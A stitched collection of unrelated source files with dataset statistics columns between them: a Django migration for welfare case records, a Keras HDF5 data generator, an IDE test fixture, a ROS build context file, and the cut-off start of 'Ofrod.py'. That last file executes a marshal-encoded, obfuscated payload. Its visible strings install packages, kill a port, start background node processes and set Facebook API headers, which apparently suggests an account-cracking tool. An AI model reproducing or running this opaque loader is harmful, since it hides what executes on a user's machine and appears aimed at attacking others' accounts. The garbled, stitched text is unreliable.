('unearnedincomeincometaxcredit', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: earned income tax credit (item 66a)')),
('unearnedincomesocialsecurity', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: social security (item 66b)')),
('unearnedincomessi', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 66c)')),
('unearnedincomeworkerscomp', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: workers compensation (item 66d)')),
('unearnedincomeother', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 66e)')),
],
),
migrations.CreateModel(
name='ClosedCase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T4)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('countyfipscode', models.IntegerField(verbose_name='county fips code (item 2)')),
('stratum', models.IntegerField(verbose_name='stratum (item 5)')),
('zipcode', models.CharField(max_length=5, verbose_name='zipcode (item 7)')),
('disposition', models.IntegerField(verbose_name='disposition (item 8)')),
('closurereason', models.IntegerField(verbose_name='reason for closure (item 9)')),
('receivessubsidizedhousing', models.CharField(max_length=1, verbose_name='receives subsidized housing (item 10)')),
('receivesmedicalassistance', models.CharField(max_length=1, verbose_name='receives medical assistance (item 11)')),
('receivesfoodstamps', models.CharField(max_length=1, verbose_name='receives food stamps (item 12)')),
('receivessubsidizedchildcare', models.CharField(max_length=1, verbose_name='receives subsidized child care (item 13)')),
],
),
migrations.CreateModel(
name='ClosedPerson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T5)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('familyafilliation', models.IntegerField(verbose_name='family affiliation (item 14)')),
('dateofbirth', models.DateField(verbose_name='date of birth (item 15)')),
('socialsecuritynumber', models.CharField(max_length=9, verbose_name='social security number (item 16)')),
('racehispanic', models.CharField(max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 17a)')),
('racenativeamerican', models.CharField(max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 17b)')),
('raceasian', models.CharField(max_length=1, verbose_name='race/ethnicity: asian (item 17c)')),
('raceblack', models.CharField(max_length=1, verbose_name='race/ethnicity: black or african american (item 17d)')),
('racepacific', models.CharField(max_length=1, verbose_name='race/ethnicity: native hawaiian or other pacific islander (item 17e)')),
('racewhite', models.CharField(max_length=1, verbose_name='race/ethnicity: white (item 17f)')),
('gender', models.IntegerField(verbose_name='gender (item 18)')),
('oasdibenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received federal disability insurance benefits under the oasdi program (item 19a)')),
('nonssabenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 19b)')),
('titlexivapdtbenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received aid to the permanently and totally disabled under title xiv-apdt (item 19c)')),
('titlexviaabdbenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received aid to the aged, blind, and disabled under title xvi-aabd (item 19d)')),
('titlexvissibenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 19e)')),
('maritalstatus', models.CharField(max_length=1, verbose_name='marital status (item 20)')),
('relationshiptohh', models.IntegerField(verbose_name='relationship to head of household (item 21)')),
('parentminorchild', models.CharField(max_length=1, verbose_name='parent with minor child in the family (item 22)')),
('pregnantneeds', models.CharField(max_length=11, verbose_name='needs of a pregnant woman (item 23)')),
('educationlevel', models.CharField(max_length=12, verbose_name='education level (item 24)')),
('citizenship', models.CharField(max_length=1, verbose_name='citizenship/alienage (item 25)')),
('countablemonths', models.IntegerField(verbose_name='number of countable months toward federal time limit (item 26)')),
('countablemonthsremaining', models.IntegerField(verbose_name='number of countable months remaining under state/tribe limit (item 27)')),
('employmentstatus', models.CharField(max_length=1, verbose_name='employment status (item 28)')),
('earnedincome', models.IntegerField(verbose_name='amount of earned income (item 29)')),
('unearnedincome', models.IntegerField(verbose_name='amount of unearned income (item 30)')),
],
),
migrations.CreateModel(
name='FamiliesByStratumData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T7)')),
('calendaryear', models.IntegerField(verbose_name='calendar year (item 3)')),
('calendarquarter', models.IntegerField(verbose_name='calendar quarter (item 3)')),
],
),
migrations.CreateModel(
name='Family',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T1)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('countyfipscode', models.IntegerField(verbose_name='county fips code (item 2)')),
('stratum', models.IntegerField(verbose_name='stratum (item 5)')),
('zipcode', models.CharField(max_length=5, verbose_name='zipcode (item 7)')),
('fundingstream', models.IntegerField(verbose_name='funding stream (item 8)')),
('disposition', models.IntegerField(verbose_name='disposition (item 9)')),
('newapplicant', models.IntegerField(verbose_name='new applicant (item 10)')),
('numfamilymembers', models.IntegerField(verbose_name='number family members (item 11)')),
('typeoffamilyforworkparticipation', models.IntegerField(verbose_name='type of family for work participation (item 12)')),
('receivessubsidizedhousing', models.CharField(max_length=1, verbose_name='receives subsidized housing (item 13)')),
('receivesmedicalassistance', models.CharField(max_length=1, verbose_name='receives medical assistance (item 14)')),
('receivesfoodstamps', models.CharField(max_length=1, verbose_name='receives food stamps (item 15)')),
('amtoffoodstampassistance', models.IntegerField(verbose_name='amount of food stamp assistance (item 16)')),
('receivessubsidizedchildcare', models.CharField(max_length=1, verbose_name='receives food stamps (item 17)')),
('amtofsubsidizedchildcare', models.IntegerField(verbose_name='amount of subsidized child care (item 18)')),
('amtofchildsupport', models.IntegerField(verbose_name='amount of child support (item 19)')),
('amtoffamilycashresources', models.IntegerField(verbose_name='amount of familys cash resources (item 20)')),
('cash_amount', models.IntegerField(verbose_name='cash and cash equivalents amount (item 21a)')),
('cash_nbr_month', models.IntegerField(verbose_name='cash and cash equivalents number of months (item 21b)')),
('tanfchildcare_amount', models.IntegerField(verbose_name='TANF child care amount (item 22a)')),
('tanfchildcare_children_covered', models.IntegerField(verbose_name='TANF child care children covered (item 22b)')),
('tanfchildcare_nbr_months', models.IntegerField(verbose_name='TANF child care number of months (item 22c)')),
('transportation_amount', models.IntegerField(verbose_name='transportation amount (item 23a)')),
('transportation_nbr_months', models.IntegerField(verbose_name='transportation number of months (item 23b)')),
('transitionalservices_amount', models.IntegerField(verbose_name='transitional services amount (item 24a')),
('transitionalservices_nbr_months', models.IntegerField(verbose_name='transitional services number of months (item 24b)')),
('other_amount', models.IntegerField(verbose_name='other amount (item 25a')),
('other_nbr_months', models.IntegerField(verbose_name='other number of months (item 25b)')),
('sanctionsreduction_amt', models.IntegerField(verbose_name='reason for and amount of assistance reduction: sanctions reduction_amount (item 26a)')),
('workrequirementssanction', models.CharField(max_length=4, verbose_name='reason for and amount of assistance reduction: work requirements sanction (item 26a)')),
('familysanctionforadultnohsdiploma', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: family sanction for adult, no high school diploma (item 26a)')),
('sanctionforteenparentnotattendingschool', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: sanction for teen parent not attending school (item 26a)')),
('noncooperatewithchildsupport', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: non-cooperation with child support (item 26a)')),
('failuretocomploywithirp', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: failure to comply with individual responsibility plan (item 26a)')),
('othersanction', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: other sanction (item 26a)')),
('recoupmentofprioroverpayment', models.CharField(max_length=4, verbose_name='reason for and amount of assistance reduction: recourpment of prior overpayment (item 26b)')),
('othertotalreductionamt', models.CharField(max_length=4, verbose_name='reason for and amount of assistance reduction: other total reduction amount (item 26c)')),
('familycap', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: family cap (item 26c)')),
('reductionbasedonlengthofreceiptofassistance', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: reduction based on length of receipt of assistance (item 26c)')),
('othernonsanction', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: other, non-sanction (item 26c)')),
('waiver_evaluation_control_gprs', models.CharField(max_length=1, verbose_name='waiver_evaluation_control_gprs (item 27)')),
('tanffamilyexemptfromtimelimits', models.IntegerField(verbose_name='TANF family exempt from time_limits (item 28)')),
('tanffamilynewchildonlyfamily', models.IntegerField(verbose_name='TANF family new child only family (item 29)')),
],
),
]
| 118.642651
| 221
| 0.67886
| 4,491
| 41,169
| 6.087286
| 0.116455
| 0.119102
| 0.098178
| 0.111566
| 0.857415
| 0.847758
| 0.827749
| 0.810008
| 0.771307
| 0.733631
| 0
| 0.022579
| 0.189949
| 41,169
| 346
| 222
| 118.985549
| 0.797175
| 0.001093
| 0
| 0.477876
| 1
| 0.014749
| 0.44188
| 0.053913
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.038348
| 0.047198
| 0
| 0.058997
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b3f03c40283ac5ffb770e2682317f3ec38057be5
| 5,064
|
py
|
Python
|
preprocessing/emotic/custom_generator.py
|
GKalliatakis/DisplaceNet
|
439bcd5ed4133b040baa107c215170eb963aa343
|
[
"MIT"
] | 7
|
2019-05-13T01:49:43.000Z
|
2020-02-19T04:16:35.000Z
|
preprocessing/emotic/custom_generator.py
|
GKalliatakis/DisplaceNet
|
439bcd5ed4133b040baa107c215170eb963aa343
|
[
"MIT"
] | null | null | null |
preprocessing/emotic/custom_generator.py
|
GKalliatakis/DisplaceNet
|
439bcd5ed4133b040baa107c215170eb963aa343
|
[
"MIT"
] | 4
|
2019-05-28T16:06:31.000Z
|
2020-02-27T09:29:16.000Z
|
"""Custom generator for pentuple-output Keras models.
"""
from math import ceil
def custom_generator(hdf5_file, nb_data, batch_size, mode):
    """ Generates batches of tensor image data in form of ==> (x1, y1) ,(x2, y2).

    # Reference
        - https://stackoverflow.com/questions/50333532/load-images-and-annotations-from-csv-and-use-fit-generator-with-multi-output-mod
        - http://machinelearninguru.com/deep_learning/data_preparation/hdf5/hdf5.html

    # Arguments
        hdf5_file: path or hdf5 object which contains the images and the annotations.
        nb_data: total number of samples saved in the array.
        batch_size: size of the batch to generate tensor image data for.
        mode: one of `train`, `val` or `test` -- selects which dataset split to read.

    # Returns
        A generator object yielding ([body_x, image_x],
        [valence_image_y, arousal_image_y, dominance_image_y]) indefinitely.

    # Raises
        ValueError: if `mode` is not one of `train`, `val` or `test`.
    """
    # Validate eagerly: an unknown mode previously caused a NameError on the
    # first batch (and silently re-yielded stale data on later iterations).
    if mode not in ('train', 'val', 'test'):
        raise ValueError("`mode` must be one of 'train', 'val' or 'test', got %r" % (mode,))
    nb_batches = int(ceil(float(nb_data) / batch_size))
    while True:
        # loop over batches; the dataset keys differ between splits only by
        # their `mode` suffix, so a single code path covers all three.
        for batch_idx in range(nb_batches):
            i_s = batch_idx * batch_size  # index of the first image in this batch
            i_e = min((batch_idx + 1) * batch_size, nb_data)  # one past the last image in this batch
            body_x = hdf5_file["x_cropped_" + mode][i_s:i_e, ...]
            image_x = hdf5_file["x_entire_" + mode][i_s:i_e, ...]
            valence_image_y = hdf5_file["valence_entire_" + mode][i_s:i_e]
            arousal_image_y = hdf5_file["arousal_entire_" + mode][i_s:i_e]
            dominance_image_y = hdf5_file["dominance_entire_" + mode][i_s:i_e]
            yield [body_x, image_x], [valence_image_y, arousal_image_y, dominance_image_y]
def custom_generator_single_output(hdf5_file, nb_data, batch_size, mode):
    """ Generates batches of tensor image data in form of ==> (x1, y1) ,(x2, y2).

    # Reference
        - https://stackoverflow.com/questions/50333532/load-images-and-annotations-from-csv-and-use-fit-generator-with-multi-output-mod
        - http://machinelearninguru.com/deep_learning/data_preparation/hdf5/hdf5.html

    # Arguments
        hdf5_file: path or hdf5 object which contains the images and the annotations.
        nb_data: total number of samples saved in the array.
        batch_size: size of the batch to generate tensor image data for.
        mode: one of `train`, `val` or `test` -- selects which dataset split to read.

    # Returns
        A generator object yielding ([body_x, image_x], y) indefinitely.

    # Raises
        ValueError: if `mode` is not one of `train`, `val` or `test`.
    """
    # Validate eagerly: an unknown mode previously caused a NameError on the
    # first batch (and silently re-yielded stale data on later iterations).
    if mode not in ('train', 'val', 'test'):
        raise ValueError("`mode` must be one of 'train', 'val' or 'test', got %r" % (mode,))
    nb_batches = int(ceil(float(nb_data) / batch_size))
    while True:
        # loop over batches; split-specific keys differ only by the `mode` suffix.
        for batch_idx in range(nb_batches):
            i_s = batch_idx * batch_size  # index of the first image in this batch
            i_e = min((batch_idx + 1) * batch_size, nb_data)  # one past the last image in this batch
            body_x = hdf5_file["x_body_" + mode][i_s:i_e, ...]
            image_x = hdf5_file["x_image_" + mode][i_s:i_e, ...]
            y = hdf5_file["y_image_" + mode][i_s:i_e]
            yield [body_x, image_x], y
| 47.327103
| 139
| 0.594194
| 733
| 5,064
| 3.748977
| 0.141883
| 0.107715
| 0.03821
| 0.048035
| 0.945051
| 0.945051
| 0.902475
| 0.902475
| 0.902475
| 0.881732
| 0
| 0.019252
| 0.292259
| 5,064
| 107
| 140
| 47.327103
| 0.747489
| 0.388033
| 0
| 0.355556
| 1
| 0
| 0.135742
| 0.015082
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.022222
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37a84a129d4aa24dad330ed70cd5a65f7d5208dc
| 190
|
py
|
Python
|
python/testData/codeInsight/mlcompletion/scopeFileDontConsiderFunctionBodies.py
|
Sajaki/intellij-community
|
6748af2c40567839d11fd652ec77ba263c074aad
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/codeInsight/mlcompletion/scopeFileDontConsiderFunctionBodies.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/codeInsight/mlcompletion/scopeFileDontConsiderFunctionBodies.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
# NOTE(review): looks like an IDE code-completion test fixture -- `<caret>`
# marks the cursor position, so this file is intentionally not runnable
# Python; confirm before "fixing" the syntax or deduplicating assignments.
def some_fun(some_param):
    some_var_1 = 22
    some_var_2 = 23
    some_var_1 = 22
    some_var_2 = 23
    SOME_VAR_3 = 24
    print(<caret>)
def some_fun_2(some_param):
    some_var_1 = 22
    some_var_2 = 23
| 15.833333
| 27
| 0.726316
| 41
| 190
| 2.902439
| 0.317073
| 0.411765
| 0.201681
| 0.252101
| 0.714286
| 0.714286
| 0.714286
| 0.714286
| 0.714286
| 0.714286
| 0
| 0.141935
| 0.184211
| 190
| 12
| 28
| 15.833333
| 0.625806
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
80cf1d9cc3750da216c86b9e31151688f75f2166
| 1,339
|
py
|
Python
|
build/ros_control/controller_manager_msgs/cmake/controller_manager_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/ros_control/controller_manager_msgs/cmake/controller_manager_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/ros_control/controller_manager_msgs/cmake/controller_manager_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
# NOTE(review): auto-generated ROS build artifact; do not edit by hand --
# changes are overwritten when CMake re-runs the genmsg configure step.
# Semicolon-separated absolute paths of this package's .msg definition files.
messages_str = "/workspace/src/ros_control/controller_manager_msgs/msg/ControllerState.msg;/workspace/src/ros_control/controller_manager_msgs/msg/ControllerStatistics.msg;/workspace/src/ros_control/controller_manager_msgs/msg/ControllersStatistics.msg;/workspace/src/ros_control/controller_manager_msgs/msg/HardwareInterfaceResources.msg"
# Semicolon-separated absolute paths of this package's .srv definition files.
services_str = "/workspace/src/ros_control/controller_manager_msgs/srv/ListControllerTypes.srv;/workspace/src/ros_control/controller_manager_msgs/srv/ListControllers.srv;/workspace/src/ros_control/controller_manager_msgs/srv/LoadController.srv;/workspace/src/ros_control/controller_manager_msgs/srv/ReloadControllerLibraries.srv;/workspace/src/ros_control/controller_manager_msgs/srv/SwitchController.srv;/workspace/src/ros_control/controller_manager_msgs/srv/UnloadController.srv"
pkg_name = "controller_manager_msgs"
# Message packages this package's definitions depend on.
dependencies_str = "std_msgs"
# Code generators to run for each supported client language.
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
# Include search paths for resolving message dependencies (pkg;path pairs).
dep_include_paths_str = "controller_manager_msgs;/workspace/src/ros_control/controller_manager_msgs/msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = 'TRUE' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 111.583333
| 481
| 0.855863
| 179
| 1,339
| 6.089385
| 0.329609
| 0.202752
| 0.250459
| 0.222018
| 0.491743
| 0.491743
| 0.491743
| 0.491743
| 0.359633
| 0
| 0
| 0.000766
| 0.025392
| 1,339
| 11
| 482
| 121.727273
| 0.834483
| 0.036594
| 0
| 0
| 1
| 0.333333
| 0.842391
| 0.817547
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
80d213377b292e640046d4ebd0e3f1da7b67fb03
| 66,279
|
py
|
Python
|
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
OFROD-main/Ofrod.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#Compiled By Raka Andrian
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sp\x03\x00\x00y\xb0\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01Wn+\x00\x04e\x0f\x00k\n\x00r\xdd\x00\x01\x01\x01e\x00\x00j\x10\x00d\x03\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x04\x00\x83\x01\x00\x01n\x01\x00Xe\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x06\x00\x83\x01\x00s\r\x01e\x00\x00j\x10\x00d\x07\x00\x83\x01\x00\x01n\x00\x00e\x00\x00j\x11\x00j\x12\x00d\x08\x00\x83\x01\x00s/\x01e\x00\x00j\x10\x00d\t\x00\x83\x01\x00\x01n\x00\x00d\x00\x00d\n\x00l\x13\x00m\x14\x00Z\x14\x00\x01e\x00\x00j\x10\x00d\x0b\x00\x83\x01\x00\x01e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00s\xc1\x01e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0f\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x12\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01nh\x00e\x00\x00j\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00r)\x02e\x00\x00j\x10\x00d\r\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x10\x00\x83\x01\x00\x01e\x00\x00j\x10\x00d\x05\x00\x83\x01\x00\x01d\x11\x00GHe\x00\x00j\x10\x00d\x14\x00\x83\x01\x00\x01e\x02\x00j\x15\x00d\x13\x00\x83\x01\x00\x01n\x00\x00e\x05\x00j\x16\x00d\x15\x00d\x16\x00\x83\x02\x00Z\x17\x00e\x05\x00j\x16\x00d\x17\x00d\x18\x00\x83\x02\x00Z\x18\x00i\x08\x00e\x19\x00e\x17\x00\x83\x01\x00d\x19\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1
a\x006e\x19\x00e\x18\x00\x83\x01\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006d \x00d!\x006d"\x00d#\x006d$\x00d%\x006Z\x1a\x00e\x1b\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x1c\x00d&\x00\x83\x01\x00\x01d\'\x00Z\x1d\x00d(\x00Z\x1e\x00d)\x00Z\x1f\x00d*\x00\x84\x00\x00Z \x00d+\x00\x84\x00\x00Z!\x00d,\x00\x84\x00\x00Z"\x00d-\x00\x84\x00\x00Z#\x00d.\x00\x84\x00\x00Z$\x00d/\x00\x84\x00\x00Z%\x00d0\x00\x84\x00\x00Z&\x00d1\x00\x84\x00\x00Z\'\x00d2\x00\x84\x00\x00Z(\x00d3\x00\x84\x00\x00Z)\x00d4\x00\x84\x00\x00Z*\x00d5\x00\x84\x00\x00Z+\x00d6\x00\x84\x00\x00Z,\x00d7\x00\x84\x00\x00Z-\x00d8\x00\x84\x00\x00Z.\x00d9\x00\x84\x00\x00Z/\x00e0\x00d:\x00k\x02\x00rl\x03e!\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(;\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPools\x15\x00\x00\x00pip2 install requestss\x0f\x00\x00\x00python2 Best.pyt\x05\x00\x00\x00clears(\x00\x00\x00/data/data/com.termux/files/usr/bin/nodes#\x00\x00\x00apt update && apt install nodejs -ys(\x00\x00\x00/data/data/com.termux/files/usr/bin/rubys)\x00\x00\x00apt install ruby -y && gem install lolcat(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionErrors\x08\x00\x00\x00git pullsG\x00\x00\x00/data/data/com.termux/files/home/hpro/...../node_modules/bytes/index.jss\x13\x00\x00\x00fuser -k 5000/tcp &t\x01\x00\x00\x00#s\x17\x00\x00\x00cd ..... && npm installs\x1b\x00\x00\x00cd ..... 
&& node index.js &s6\x00\x00\x00\x1b[1;32mPlease Select Chrome Browser To Continue\x1b[0;97ms\t\x00\x00\x00xdg-open i\n\x00\x00\x00s@\x00\x00\x00xdg-open https://www.facebook.com/profile.php?id=100000395779504g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|Ag\x00\x00\x00\x00\x00\x88\xd3@g\x00\x00\x00\x00\x00\x88\xe3@s\x19\x00\x00\x00x-fb-connection-bandwidths\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\xbe\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines\x05\x00\x00\x00utf-8s\x07\x00\x00\x00\x1b[1;32ms\x07\x00\x00\x00\x1b[0;97ms\x07\x00\x00\x00\x1b[1;31mc\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x11\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xda\x03\x00\x00echo -e 